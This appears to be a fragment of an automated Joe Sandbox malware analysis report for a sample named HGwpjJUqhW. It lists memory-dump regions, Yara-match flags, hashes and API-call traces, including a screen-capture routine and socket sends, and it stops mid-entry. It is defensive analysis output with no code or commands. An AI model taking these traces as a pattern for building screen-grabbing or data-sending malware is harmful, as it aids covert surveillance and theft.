                                                                                                                            • Opcode ID: 9ce155e94c533ac3d93a6d6b6224bc583fba0862e8e6cd6b02ea1555d98038d8
                                                                                                                            • Instruction ID: 4e26e12471f0dd15a9e5209f7a0109e37f2361c489745e9622f26cfb2ac54e0f
                                                                                                                            • Opcode Fuzzy Hash: 9ce155e94c533ac3d93a6d6b6224bc583fba0862e8e6cd6b02ea1555d98038d8
                                                                                                                            • Instruction Fuzzy Hash: BB118B75600B109BD330DB64CD44B67B7EABB84B00F19881CE5AA8BB80D774F842CF91
                                                                                                                            APIs
                                                                                                                            • WSAEventSelect.WS2_32(?,02C33ABB,00000023), ref: 02C33C02
                                                                                                                            • WSAGetLastError.WS2_32 ref: 02C33C0D
                                                                                                                            • send.WS2_32(?,00000000,00000000,00000000), ref: 02C33C58
                                                                                                                            • WSAGetLastError.WS2_32 ref: 02C33C63
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$EventSelectsend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 259408233-0
                                                                                                                            • Opcode ID: 4c77034ca22871937e6bf2c8610ff5bc8bba82f24ae98535499186ee48d719d2
                                                                                                                            • Instruction ID: b3b17176c0352bfc9c9ff7e036f9a213f1e7ca0ec6edde5ffdce29dbaca238dc
                                                                                                                            • Opcode Fuzzy Hash: 4c77034ca22871937e6bf2c8610ff5bc8bba82f24ae98535499186ee48d719d2
                                                                                                                            • Instruction Fuzzy Hash: 56115EB6A00B405BD3209F79EC88A57B6E9BBC8714F510F2DE657C3680D776E940DB90
                                                                                                                            APIs
                                                                                                                            • WSAEventSelect.WS2_32(?,03623ABB,00000023), ref: 03623C02
                                                                                                                            • WSAGetLastError.WS2_32 ref: 03623C0D
                                                                                                                            • send.WS2_32(?,00000000,00000000,00000000), ref: 03623C58
                                                                                                                            • WSAGetLastError.WS2_32 ref: 03623C63
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$EventSelectsend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 259408233-0
                                                                                                                            • Opcode ID: d894b0d7ae48dd9ecec09af819c3a6cc4c4ff1af2c222c9142c83440d1554100
                                                                                                                            • Instruction ID: 612a65e976bca07532c8e83b858ccae2d000c64a01669d13801a7ccce629882c
                                                                                                                            • Opcode Fuzzy Hash: d894b0d7ae48dd9ecec09af819c3a6cc4c4ff1af2c222c9142c83440d1554100
                                                                                                                            • Instruction Fuzzy Hash: 29118CBA700B109BD720EF79D988A57BBF9BB89710F225A2DF596C7780D734E4008B50
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3016257755-0
                                                                                                                            • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                            • Instruction ID: de330f31e4b196aa62755f20f93fe08a351bbd0762d4de4191ec8a8522d6862b
                                                                                                                            • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                            • Instruction Fuzzy Hash: C9113D3644014AFBCF536E85DC51CEE3F22BF58358F498819FA5859430C336CAB1AB81
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3016257755-0
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135368981.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2880000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3016257755-0
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138171023.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_34a0000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3016257755-0
                                                                                                                            APIs
                                                                                                                            • EnterCriticalSection.KERNEL32(03624FB5,03624E55,036242BE,00000000,?,?,03624E55,?,?,?,?,00000000,000000FF), ref: 036241E8
                                                                                                                            • LeaveCriticalSection.KERNEL32(03624FB5,?,?,?,00000000,000000FF), ref: 036241F6
                                                                                                                            • LeaveCriticalSection.KERNEL32(03624FB5), ref: 03624257
                                                                                                                            • SetEvent.KERNEL32(8520468B), ref: 03624272
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$Leave$EnterEvent
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3394196147-0
                                                                                                                            APIs
                                                                                                                            • timeGetTime.WINMM(00000001,?,00000001,?,02C33C4F,?,?,00000001), ref: 02C34AF5
                                                                                                                            • InterlockedIncrement.KERNEL32(00000001), ref: 02C34B04
                                                                                                                            • InterlockedIncrement.KERNEL32(00000001), ref: 02C34B11
                                                                                                                            • timeGetTime.WINMM(?,02C33C4F,?,?,00000001), ref: 02C34B28
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: IncrementInterlockedTimetime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 159728177-0
                                                                                                                            APIs
                                                                                                                            • timeGetTime.WINMM(00000001,?,00000001,?,03623C4F,?,?,00000001), ref: 03624B15
                                                                                                                            • InterlockedIncrement.KERNEL32(00000001), ref: 03624B24
                                                                                                                            • InterlockedIncrement.KERNEL32(00000001), ref: 03624B31
                                                                                                                            • timeGetTime.WINMM(?,03623C4F,?,?,00000001), ref: 03624B48
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: IncrementInterlockedTimetime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 159728177-0
                                                                                                                            APIs
                                                                                                                            • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 02C33667
                                                                                                                            • _free.LIBCMT ref: 02C3369C
                                                                                                                              • Part of subcall function 02C36E49: HeapFree.KERNEL32(00000000,00000000,?,02C39900,00000000,?,02C39FB0,00000000,00000001,00000000,?,02C3C0CF,00000018,02C47C70,0000000C,02C3C15F), ref: 02C36E5F
                                                                                                                              • Part of subcall function 02C36E49: GetLastError.KERNEL32(00000000,?,02C39900,00000000,?,02C39FB0,00000000,00000001,00000000,?,02C3C0CF,00000018,02C47C70,0000000C,02C3C15F,00000000), ref: 02C36E71
                                                                                                                            • _malloc.LIBCMT ref: 02C336D7
                                                                                                                            • _memset.LIBCMT ref: 02C336E5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateErrorFreeHeapLastTimerWaitable_free_malloc_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3340475617-0
                                                                                                                            APIs
                                                                                                                            • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 03623667
                                                                                                                            • _free.LIBCMT ref: 0362369C
                                                                                                                              • Part of subcall function 0362F639: RtlFreeHeap.NTDLL(00000000,00000000,?,03633E4C,00000000,?,03634500,00000000,00000001,00000000,?,03638DE6,00000018,03646448,0000000C,03638E76), ref: 0362F64F
                                                                                                                              • Part of subcall function 0362F639: GetLastError.KERNEL32(00000000,?,03633E4C,00000000,?,03634500,00000000,00000001,00000000,?,03638DE6,00000018,03646448,0000000C,03638E76,00000000), ref: 0362F661
                                                                                                                            • _malloc.LIBCMT ref: 036236D7
                                                                                                                            • _memset.LIBCMT ref: 036236E5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateErrorFreeHeapLastTimerWaitable_free_malloc_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3340475617-0
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 02886F08
                                                                                                                              • Part of subcall function 02886E5A: __FF_MSGBANNER.LIBCMT ref: 02886E73
                                                                                                                              • Part of subcall function 02886E5A: __NMSG_WRITE.LIBCMT ref: 02886E7A
                                                                                                                            • std::exception::exception.LIBCMT ref: 02886F3D
                                                                                                                            • std::exception::exception.LIBCMT ref: 02886F57
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 02886F68
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135368981.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2880000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: std::exception::exception$Exception@8Throw_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2388904642-0
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 034AF0E0
                                                                                                                              • Part of subcall function 034AF032: __FF_MSGBANNER.LIBCMT ref: 034AF04B
                                                                                                                              • Part of subcall function 034AF032: __NMSG_WRITE.LIBCMT ref: 034AF052
                                                                                                                            • std::exception::exception.LIBCMT ref: 034AF115
                                                                                                                            • std::exception::exception.LIBCMT ref: 034AF12F
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 034AF140
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138171023.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_34a0000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: std::exception::exception$Exception@8Throw_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2388904642-0
                                                                                                                            • Opcode ID: b08fdf8cb5e3b65abb6e8e2bd981c9ae2de8ac343fbf2f6e0fd6789c4a68690e
                                                                                                                            • Instruction ID: 04d7a93dbe51c8da1370dcd0eda14fb668393a7da450af7a02e30f5850d55e47
                                                                                                                            • Opcode Fuzzy Hash: b08fdf8cb5e3b65abb6e8e2bd981c9ae2de8ac343fbf2f6e0fd6789c4a68690e
                                                                                                                            • Instruction Fuzzy Hash: 86F04435800B14AFDB14EB99DC60ABF7AA8EB10244F94402EE800AE180CB308A06CB54
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 02C31420: HeapFree.KERNEL32(?,00000000,?,?,?,02C340B1,?,00000000,02C34039,?,74DEDFA0,02C33648), ref: 02C3143D
                                                                                                                              • Part of subcall function 02C31420: _free.LIBCMT ref: 02C31459
                                                                                                                            • HeapDestroy.KERNEL32(00000000), ref: 02C364A3
                                                                                                                            • HeapCreate.KERNEL32(?,?,?), ref: 02C364B5
                                                                                                                            • _free.LIBCMT ref: 02C364C5
                                                                                                                            • HeapDestroy.KERNEL32 ref: 02C364F2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Destroy_free$CreateFree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4097506873-0
                                                                                                                            • Opcode ID: dbe69951c95950d3cf55ef2770884d2e735f4f31497cb011b51e9e66fe431d02
                                                                                                                            • Instruction ID: c0c61f0f05275fce3f615f6ceeb38dae38bfb3ded082e67a4b40fa700768304c
                                                                                                                            • Opcode Fuzzy Hash: dbe69951c95950d3cf55ef2770884d2e735f4f31497cb011b51e9e66fe431d02
                                                                                                                            • Instruction Fuzzy Hash: 69F014B9900702ABE7219F25E808B13B7F8BF84764F248918E85997240DB34F8658BE0
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 03621420: HeapFree.KERNEL32(?,00000000,?,?,?,036240B1,?,00000000,03624039,?,74DEDFA0,03623648), ref: 0362143D
                                                                                                                              • Part of subcall function 03621420: _free.LIBCMT ref: 03621459
                                                                                                                            • HeapDestroy.KERNEL32(00000000), ref: 0362CD93
                                                                                                                            • HeapCreate.KERNEL32(?,?,?), ref: 0362CDA5
                                                                                                                            • _free.LIBCMT ref: 0362CDB5
                                                                                                                            • HeapDestroy.KERNEL32 ref: 0362CDE2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Destroy_free$CreateFree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4097506873-0
                                                                                                                            • Opcode ID: da8f6167f1729e14d668317b64dc77a604be607314adb8e61b0d2d2d0e0a5eaa
                                                                                                                            • Instruction ID: 64bb298d37355f375c09e0ddec12195d8822f0e4db10ff3b64bf95a5944400a9
                                                                                                                            • Opcode Fuzzy Hash: da8f6167f1729e14d668317b64dc77a604be607314adb8e61b0d2d2d0e0a5eaa
                                                                                                                            • Instruction Fuzzy Hash: 76F014B9500B12ABD310EF24E918B57FBB8FF84610F258918E8598BA44DB34E851CFA0
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 034A997F
                                                                                                                              • Part of subcall function 034AF032: __FF_MSGBANNER.LIBCMT ref: 034AF04B
                                                                                                                              • Part of subcall function 034AF032: __NMSG_WRITE.LIBCMT ref: 034AF052
                                                                                                                            • _memcpy_s.LIBCMT ref: 034A9B42
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138171023.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_34a0000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _malloc_memcpy_s
                                                                                                                            • String ID: &
                                                                                                                            • API String ID: 3561290194-3042966939
                                                                                                                            • Opcode ID: c8a5b5b6493a3e00500570122ab972c2785b00225f4301cae1c49e60748ae0d9
                                                                                                                            • Instruction ID: 3cffc98a2bff64037f73accde5010aa569f40fccaf9d5034111c1902ad5f48ed
                                                                                                                            • Opcode Fuzzy Hash: c8a5b5b6493a3e00500570122ab972c2785b00225f4301cae1c49e60748ae0d9
                                                                                                                            • Instruction Fuzzy Hash: 72C153F1A006199FDB24CF59CCC0B9AB7B8EF58300F1485AED6199B341D774AA85CF58
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138171023.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_34a0000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset_wcsrchr
                                                                                                                            • String ID: D
                                                                                                                            • API String ID: 1675014779-2746444292
                                                                                                                            • Opcode ID: 9448fe74a29e6cb94ba3ba7ffaf0542041cc64757f3c043286b2e5ea21082185
                                                                                                                            • Instruction ID: 80e26dc7400889838edcc8ad0de3a3f3c511c6eb81a25a65c7f203ac6a370ab5
                                                                                                                            • Opcode Fuzzy Hash: 9448fe74a29e6cb94ba3ba7ffaf0542041cc64757f3c043286b2e5ea21082185
                                                                                                                            • Instruction Fuzzy Hash: D131F4729402187BE720DBA49C89FEB776CEB54710F14012AFA0AAE1C1DA759906C6E9
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0362BC70: GetDesktopWindow.USER32 ref: 0362BC8F
                                                                                                                              • Part of subcall function 0362BC70: GetDC.USER32(00000000), ref: 0362BC9C
                                                                                                                              • Part of subcall function 0362BC70: CreateCompatibleDC.GDI32(00000000), ref: 0362BCA2
                                                                                                                              • Part of subcall function 0362BC70: GetDC.USER32(00000000), ref: 0362BCAD
                                                                                                                              • Part of subcall function 0362BC70: GetDeviceCaps.GDI32(00000000,00000008), ref: 0362BCBA
                                                                                                                              • Part of subcall function 0362BC70: GetDeviceCaps.GDI32(00000000,00000076), ref: 0362BCC2
                                                                                                                              • Part of subcall function 0362BC70: ReleaseDC.USER32(00000000,00000000), ref: 0362BCD3
                                                                                                                              • Part of subcall function 0362BC70: GetSystemMetrics.USER32(0000004C), ref: 0362BD78
                                                                                                                              • Part of subcall function 0362BC70: GetSystemMetrics.USER32(0000004D), ref: 0362BD8D
                                                                                                                              • Part of subcall function 0362BC70: CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 0362BDA6
                                                                                                                              • Part of subcall function 0362BC70: SelectObject.GDI32(?,00000000), ref: 0362BDB4
                                                                                                                              • Part of subcall function 0362BC70: SetStretchBltMode.GDI32(?,00000003), ref: 0362BDC0
                                                                                                                              • Part of subcall function 0362BC70: GetSystemMetrics.USER32(0000004F), ref: 0362BDCD
                                                                                                                              • Part of subcall function 0362BC70: GetSystemMetrics.USER32(0000004E), ref: 0362BDE0
                                                                                                                              • Part of subcall function 0362F707: _malloc.LIBCMT ref: 0362F721
                                                                                                                            • _memset.LIBCMT ref: 0362B1E1
                                                                                                                            • swprintf.LIBCMT ref: 0362B204
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: MetricsSystem$CapsCompatibleCreateDevice$BitmapDesktopModeObjectReleaseSelectStretchWindow_malloc_memsetswprintf
                                                                                                                            • String ID: %s %s
                                                                                                                            • API String ID: 1028806752-581060391
                                                                                                                            • Opcode ID: 6178acec4da6cbb117076893e01d9448d0763423558c0d2da636fed1a289f94e
                                                                                                                            • Instruction ID: 941279955c217821ae40c1b10dc7d2ac6a8a9440ed491e9d4d7fb9c0bf4ec436
                                                                                                                            • Opcode Fuzzy Hash: 6178acec4da6cbb117076893e01d9448d0763423558c0d2da636fed1a289f94e
                                                                                                                            • Instruction Fuzzy Hash: F3210776A04710ABD310EB15DC81E6FBBE8EFD9710F05052DF4895B241E6B1D904CBA7
                                                                                                                            APIs
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 03629115
                                                                                                                              • Part of subcall function 0362EF39: std::exception::exception.LIBCMT ref: 0362EF4E
                                                                                                                              • Part of subcall function 0362EF39: __CxxThrowException@8.LIBCMT ref: 0362EF63
                                                                                                                              • Part of subcall function 0362EF39: std::exception::exception.LIBCMT ref: 0362EF74
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 03629128
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                                            • String ID: string too long
                                                                                                                            • API String ID: 963545896-2556327735
                                                                                                                            • Opcode ID: 5be508bc692a2da11700b8e2538278f581edb822a4c5d5b2584673af9c6db63e
                                                                                                                            • Instruction ID: 9cb17a4b303a237e6af3bf4834007b3c40aa303a46b016c58bfca1e09a4f7082
                                                                                                                            • Opcode Fuzzy Hash: 5be508bc692a2da11700b8e2538278f581edb822a4c5d5b2584673af9c6db63e
                                                                                                                            • Instruction Fuzzy Hash: A111E935700B608BC321CA2DE808A17BFE9DBD6710F160A6EE591CB741C771D410CBA5
                                                                                                                            APIs
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0362941D
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 0362944A
                                                                                                                            Strings
                                                                                                                            • invalid string position, xrefs: 03629445
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Exception@8ThrowXinvalid_argumentstd::_
                                                                                                                            • String ID: invalid string position
                                                                                                                            • API String ID: 3614006799-1799206989
                                                                                                                            • Opcode ID: a5788bba409d342b0341ebd608fd686160e26e125527a723634e7f653b635b54
                                                                                                                            • Instruction ID: 2b5e1b4059f637e94f9e1be7021f38e225574d5052efaa5a94b023fc345c909c
                                                                                                                            • Opcode Fuzzy Hash: a5788bba409d342b0341ebd608fd686160e26e125527a723634e7f653b635b54
                                                                                                                            • Instruction Fuzzy Hash: F40126336007205BC324EE68C880B9AFBD9AF81720F164A3DE5529F680D772E950CBE4
                                                                                                                            APIs
                                                                                                                            • __output_l.LIBCMT ref: 02886FFC
                                                                                                                              • Part of subcall function 028870E4: __getptd_noexit.LIBCMT ref: 028870E4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135368981.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2880000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd_noexit__output_l
                                                                                                                            • String ID: B
                                                                                                                            • API String ID: 2141734944-1255198513
                                                                                                                            • Opcode ID: 9d13b0dc1e7cc3b4a828052403ade02a95932ad8b58c16c5deaaa246e36644c3
                                                                                                                            • Instruction ID: 3cf38d7283005a941b4309dead69d7fdaa71fb35e15c03ac5dd3304fdab03949
                                                                                                                            • Opcode Fuzzy Hash: 9d13b0dc1e7cc3b4a828052403ade02a95932ad8b58c16c5deaaa246e36644c3
                                                                                                                            • Instruction Fuzzy Hash: 4101877A90425D9BEF00AFA8CC00BEEBBB9FB04364F100165E924E6281E7749500CBB2
                                                                                                                            APIs
                                                                                                                            • __output_l.LIBCMT ref: 034AF1D4
                                                                                                                              • Part of subcall function 034AF2DA: __getptd_noexit.LIBCMT ref: 034AF2DA
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
